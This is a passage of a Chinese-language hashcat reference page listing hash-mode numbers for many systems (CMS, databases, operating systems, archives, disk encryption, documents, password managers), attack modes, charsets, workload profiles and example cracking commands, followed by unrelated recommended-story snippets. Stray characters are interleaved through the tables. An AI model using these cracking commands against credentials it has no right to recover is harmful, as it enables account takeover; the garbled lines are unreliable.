8400 WBB3 (Woltlab Burning Board) 論壇蜗顽,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)雨让,框架
11 Joomla < 2.5.18 論壇雇盖,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)栖忠,框架
400 Joomla >= 2.5.18 (MD5) 論壇崔挖,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)庵寞,框架
400 WordPress (MD5) 論壇狸相,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)捐川,框架
2612 PHPS 論壇脓鹃,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)古沥,框架
7900 Drupal7 論壇瘸右,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)渐白,框架
21 osCommerce 論壇尊浓,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)纯衍,框架
21 xt:Commerce 論壇,內(nèi)容管理系統(tǒng)(CMS)苗胀,電子商務(wù)襟诸,框架
11000 PrestaShop 論壇瓦堵,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)歌亲,框架
124 Django (SHA-1) 論壇菇用,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)陷揪,框架
10000 Django (PBKDF2-SHA256) 論壇惋鸥,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)悍缠,框架
3711 MediaWiki B type 論壇卦绣,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)飞蚓,框架
13900 OpenCart 論壇滤港,內(nèi)容管理系統(tǒng)(CMS)品山,電子商務(wù)席吴,框架
4521 Redmine 論壇,內(nèi)容管理系統(tǒng)(CMS)计露,電子商務(wù)著榴,框架
4522 PunBB 論壇添履,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)脑又,框架
12001 Atlassian (PBKDF2-HMAC-SHA1) 論壇缝龄,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)挂谍,框架
12 PostgreSQL 數(shù)據(jù)庫服務(wù)器
131 MSSQL (2000) 數(shù)據(jù)庫服務(wù)器
132 MSSQL (2005) 數(shù)據(jù)庫服務(wù)器
1731 MSSQL (2012, 2014) 數(shù)據(jù)庫服務(wù)器
200 MySQL323 數(shù)據(jù)庫服務(wù)器
300 MySQL4.1/MySQL5 數(shù)據(jù)庫服務(wù)器
3100 Oracle H: Type (Oracle 7+) 數(shù)據(jù)庫服務(wù)器
112 Oracle S: Type (Oracle 11+) 數(shù)據(jù)庫服務(wù)器
12300 Oracle T: Type (Oracle 12+) 數(shù)據(jù)庫服務(wù)器
8000 Sybase ASE 數(shù)據(jù)庫服務(wù)器
141 Episerver 6.x < .NET 4 HTTP叔壤,SMTP,LDAP服務(wù)器
1441 Episerver 6.x >= .NET 4 HTTP口叙,SMTP炼绘,LDAP服務(wù)器
1600 Apache apr1 MD5, md5apr1, MD5 (APR) HTTP,SMTP妄田,LDAP服務(wù)器
12600 ColdFusion 10+ HTTP俺亮,SMTP,LDAP服務(wù)器
1421 hMailServer HTTP疟呐,SMTP脚曾,LDAP服務(wù)器
101 nsldap, SHA-1(Base64), Netscape LDAP SHA HTTP,SMTP启具,LDAP服務(wù)器
111 nsldaps, SSHA-1(Base64), Netscape LDAP SSHA HTTP本讥,SMTP,LDAP服務(wù)器
1411 SSHA-256(Base64), LDAP {SSHA256} HTTP,SMTP拷沸,LDAP服務(wù)器
1711 SSHA-512(Base64), LDAP {SSHA512} HTTP色查,SMTP,LDAP服務(wù)器
15000 FileZilla Server >= 0.9.55 FTP 服務(wù)器
11500 CRC32 校驗和
3000 LM 操作系統(tǒng)
1000 NTLM 操作系統(tǒng)
1100 Domain Cached Credentials (DCC), MS Cache 操作系統(tǒng)
2100 Domain Cached Credentials 2 (DCC2), MS Cache 2 操作系統(tǒng)
12800 MS-AzureSync PBKDF2-HMAC-SHA256 操作系統(tǒng)
1500 descrypt, DES (Unix), Traditional DES 操作系統(tǒng)
12400 BSDiCrypt, Extended DES 操作系統(tǒng)
500 md5crypt, MD5 (Unix), Cisco-IOS 1 (MD5) 操作系統(tǒng)
3200 bcrypt 2*, Blowfish (Unix) 操作系統(tǒng)
7400 sha256crypt 5, SHA256 (Unix) 操作系統(tǒng)
1800 sha512crypt 6, SHA512 (Unix) 操作系統(tǒng)
122 OSX v10.4, OSX v10.5, OSX v10.6 操作系統(tǒng)
1722 OSX v10.7 操作系統(tǒng)
7100 OSX v10.8+ (PBKDF2-SHA512) 操作系統(tǒng)
6300 AIX {smd5} 操作系統(tǒng)
6700 AIX {ssha1} 操作系統(tǒng)
6400 AIX {ssha256} 操作系統(tǒng)
6500 AIX {ssha512} 操作系統(tǒng)
2400 Cisco-PIX MD5 操作系統(tǒng)
2410 Cisco-ASA MD5 操作系統(tǒng)
500 Cisco-IOS 1 (MD5) 操作系統(tǒng)
5700 Cisco-IOS type 4 (SHA256) 操作系統(tǒng)
9200 Cisco-IOS 8 (PBKDF2-SHA256) 操作系統(tǒng)
9300 Cisco-IOS 9 (scrypt) 操作系統(tǒng)
22 Juniper NetScreen/SSG (ScreenOS) 操作系統(tǒng)
501 Juniper IVE 操作系統(tǒng)
15100 Juniper/NetBSD sha1crypt 操作系統(tǒng)
7000 FortiGate (FortiOS) 操作系統(tǒng)
5800 Samsung Android Password/PIN 操作系統(tǒng)
13800 Windows Phone 8+ PIN/password 操作系統(tǒng)
8100 Citrix NetScaler 操作系統(tǒng)
8500 RACF 操作系統(tǒng)
7200 GRUB 2 操作系統(tǒng)
9900 Radmin2 操作系統(tǒng)
125 ArubaOS 操作系統(tǒng)
7700 SAP CODVN B (BCODE) 企業(yè)應(yīng)用軟件(EAS)
7800 SAP CODVN F/G (PASSCODE) 企業(yè)應(yīng)用軟件(EAS)
10300 SAP CODVN H (PWDSALTEDHASH) iSSHA-1 企業(yè)應(yīng)用軟件(EAS)
8600 Lotus Notes/Domino 5 企業(yè)應(yīng)用軟件(EAS)
8700 Lotus Notes/Domino 6 企業(yè)應(yīng)用軟件(EAS)
9100 Lotus Notes/Domino 8 企業(yè)應(yīng)用軟件(EAS)
133 PeopleSoft 企業(yè)應(yīng)用軟件(EAS)
13500 PeopleSoft PS_TOKEN 企業(yè)應(yīng)用軟件(EAS)
11600 7-Zip 壓縮/存檔
12500 RAR3-hp 壓縮/存檔
13000 RAR5 壓縮/存檔
13200 AxCrypt 壓縮/存檔
13300 AxCrypt in-memory SHA1 壓縮/存檔
13600 WinZip 壓縮/存檔
14700 iTunes 備份 < 10.0 備份
14800 iTunes 備份 >= 10.0 備份
62XY TrueCrypt 全盤加密(FDE)
X 1 = PBKDF2-HMAC-RIPEMD160 全盤加密(FDE)
X 2 = PBKDF2-HMAC-SHA512 全盤加密(FDE)
X 3 = PBKDF2-HMAC-Whirlpool 全盤加密(FDE)
X 4 = PBKDF2-HMAC-RIPEMD160 + boot-mode 全盤加密(FDE)
Y 1 = XTS 512 bit pure AES 全盤加密(FDE)
Y 1 = XTS 512 bit pure Serpent 全盤加密(FDE)
Y 1 = XTS 512 bit pure Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit pure AES 全盤加密(FDE)
Y 2 = XTS 1024 bit pure Serpent 全盤加密(FDE)
Y 2 = XTS 1024 bit pure Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded AES-Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded Serpent-AES 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded Twofish-Serpent 全盤加密(FDE)
Y 3 = XTS 1536 bit all 全盤加密(FDE)
8800 Android FDE <= 4.3 全盤加密(FDE)
12900 Android FDE (Samsung DEK) 全盤加密(FDE)
12200 eCryptfs 全盤加密(FDE)
137XY VeraCrypt 全盤加密(FDE)
X 1 = PBKDF2-HMAC-RIPEMD160 全盤加密(FDE)
X 2 = PBKDF2-HMAC-SHA512 全盤加密(FDE)
X 3 = PBKDF2-HMAC-Whirlpool 全盤加密(FDE)
X 4 = PBKDF2-HMAC-RIPEMD160 + boot-mode 全盤加密(FDE)
X 5 = PBKDF2-HMAC-SHA256 全盤加密(FDE)
X 6 = PBKDF2-HMAC-SHA256 + boot-mode 全盤加密(FDE)
Y 1 = XTS 512 bit pure AES 全盤加密(FDE)
Y 1 = XTS 512 bit pure Serpent 全盤加密(FDE)
Y 1 = XTS 512 bit pure Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit pure AES 全盤加密(FDE)
Y 2 = XTS 1024 bit pure Serpent 全盤加密(FDE)
Y 2 = XTS 1024 bit pure Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded AES-Twofish 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded Serpent-AES 全盤加密(FDE)
Y 2 = XTS 1024 bit cascaded Twofish-Serpent 全盤加密(FDE)
Y 3 = XTS 1536 bit all 全盤加密(FDE)
14600 LUKS 全盤加密(FDE)
9700 MS Office <= 2003 0/1, MD5 + RC4 文檔
9710 MS Office <= 2003 0/1, MD5 + RC4, collider #1 文檔
9720 MS Office <= 2003 0/1, MD5 + RC4, collider #2 文檔
9800 MS Office <= 2003 3/4, SHA1 + RC4 文檔
9810 MS Office <= 2003 3/4, SHA1 + RC4, collider #1 文檔
9820 MS Office <= 2003 3/4, SHA1 + RC4, collider #2 文檔
9400 MS Office 2007 文檔
9500 MS Office 2010 文檔
9600 MS Office 2013 文檔
10400 PDF 1.1 - 1.3 (Acrobat 2 - 4) 文檔
10410 PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 文檔
10420 PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 文檔
10500 PDF 1.4 - 1.6 (Acrobat 5 - 8) 文檔
10600 PDF 1.7 Level 3 (Acrobat 9) 文檔
10700 PDF 1.7 Level 8 (Acrobat 10 - 11) 文檔
9000 Password Safe v2 密碼管理軟件
5200 Password Safe v3 密碼管理軟件
6800 LastPass + LastPass sniffed 密碼管理軟件
6600 1Password, agilekeychain 密碼管理軟件
8200 1Password, cloudkeychain 密碼管理軟件
11300 Bitcoin/Litecoin wallet.dat 密碼管理軟件
12700 Blockchain, My Wallet 密碼管理軟件
13400 KeePass 1 (AES/Twofish) and KeePass 2 (AES) 密碼管理軟件
99999 Plaintext Blockchain明文撞芍,我的錢包

③ 輸出格式

編號 格式
1 hash[:salt]
2 plain
3 hash[:salt]:plain
4 hex_plain
5 hash[:salt]:hex_plain
6 plain:hex_plain
7 hash[:salt]:plain:hex_plain
8 crackpos
9 hash[:salt]:crack_pos
10 plain:crack_pos
11 hash[:salt]:plain:crack_pos
12 hex_plain:crack_pos
13 hash[:salt]:hex_plain:crack_pos
14 plain:hex_plain:crack_pos
15 hash[:salt]:plain:hex_plain:crack_pos

④ 調(diào)試模式規(guī)則

編號 格式
1 查找規(guī)則
2 原始詞
3 原始詞:查找規(guī)則
4 原始詞:查找規(guī)則:已處理詞

⑤ 攻擊模式

編號 模式
0 直接
1 組合
3 暴力窮舉
6 混合 字典 + 掩碼
7 混合 掩碼 + 字典

⑥ 內(nèi)置字符集

? 字符集
l abcdefghijklmnopqrstuvwxyz
u ABCDEFGHIJKLMNOPQRSTUVWXYZ
d 0123456789
h 0123456789abcdef
H 0123456789ABCDEF
s !"#$%&'()*+,-./:;<=>?@[]^_`{ }~
a ?l?u?d?s
b 0x00 - 0xff

⑦ OpenCL設(shè)備類型

編號 設(shè)備類型
1 CPU
2 GPU
3 現(xiàn)場可編程門陣列(FPGA)秧了,數(shù)字信號處理器(DSP),協(xié)處理器(Co-Processor)

⑧ 工作負載配置文件

編號 性能 運行時間 能量消耗 桌面影響
1 2 ms 最小
2 默認 12 ms 經(jīng)濟型 可察覺
3 96 ms 沒有反應(yīng)
4 噩夢 480 ms 瘋狂的 無法控制

⑨ 基本用例

攻擊模式 Hash種類 示例命令
字典 P hashcat -a 0 -m 400 example400.hash example.dict
字典+規(guī)則 MD5 hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
暴力窮舉 MD5 hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
組合 MD5 hashcat -a 1 -m 0 example0.hash example.dict example.dict
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末序无,一起剝皮案震驚了整個濱河市验毡,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌帝嗡,老刑警劉巖晶通,帶你破解...
    沈念sama閱讀 212,718評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異丈探,居然都是意外死亡录择,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,683評論 3 385
  • 文/潘曉璐 我一進店門碗降,熙熙樓的掌柜王于貴愁眉苦臉地迎上來隘竭,“玉大人,你說我怎么就攤上這事讼渊《矗” “怎么了?”我有些...
    開封第一講書人閱讀 158,207評論 0 348
  • 文/不壞的土叔 我叫張陵爪幻,是天一觀的道長菱皆。 經(jīng)常有香客問我,道長挨稿,這世上最難降的妖魔是什么仇轻? 我笑而不...
    開封第一講書人閱讀 56,755評論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮奶甘,結(jié)果婚禮上篷店,老公的妹妹穿的比我還像新娘。我一直安慰自己臭家,他們只是感情好疲陕,可當(dāng)我...
    茶點故事閱讀 65,862評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著钉赁,像睡著了一般蹄殃。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上你踩,一...
    開封第一講書人閱讀 50,050評論 1 291
  • 那天诅岩,我揣著相機與錄音讳苦,去河邊找鬼。 笑死按厘,一個胖子當(dāng)著我的面吹牛医吊,可吹牛的內(nèi)容都是我干的钱慢。 我是一名探鬼主播逮京,決...
    沈念sama閱讀 39,136評論 3 410
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼束莫!你這毒婦竟也來了懒棉?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,882評論 0 268
  • 序言:老撾萬榮一對情侶失蹤览绿,失蹤者是張志新(化名)和其女友劉穎策严,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體饿敲,經(jīng)...
    沈念sama閱讀 44,330評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡妻导,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,651評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了怀各。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片倔韭。...
    茶點故事閱讀 38,789評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖瓢对,靈堂內(nèi)的尸體忽然破棺而出寿酌,到底是詐尸還是另有隱情,我是刑警寧澤硕蛹,帶...
    沈念sama閱讀 34,477評論 4 333
  • 正文 年R本政府宣布醇疼,位于F島的核電站,受9級特大地震影響法焰,放射性物質(zhì)發(fā)生泄漏秧荆。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 40,135評論 3 317
  • 文/蒙蒙 一埃仪、第九天 我趴在偏房一處隱蔽的房頂上張望乙濒。 院中可真熱鬧,春花似錦贵试、人聲如沸琉兜。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,864評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽豌蟋。三九已至,卻和暖如春桑滩,著一層夾襖步出監(jiān)牢的瞬間梧疲,已是汗流浹背允睹。 一陣腳步聲響...
    開封第一講書人閱讀 32,099評論 1 267
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留幌氮,地道東北人缭受。 一個月前我還...
    沈念sama閱讀 46,598評論 2 362
  • 正文 我出身青樓,卻偏偏與公主長得像该互,于是被迫代替她去往敵國和親米者。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,697評論 2 351

推薦閱讀更多精彩內(nèi)容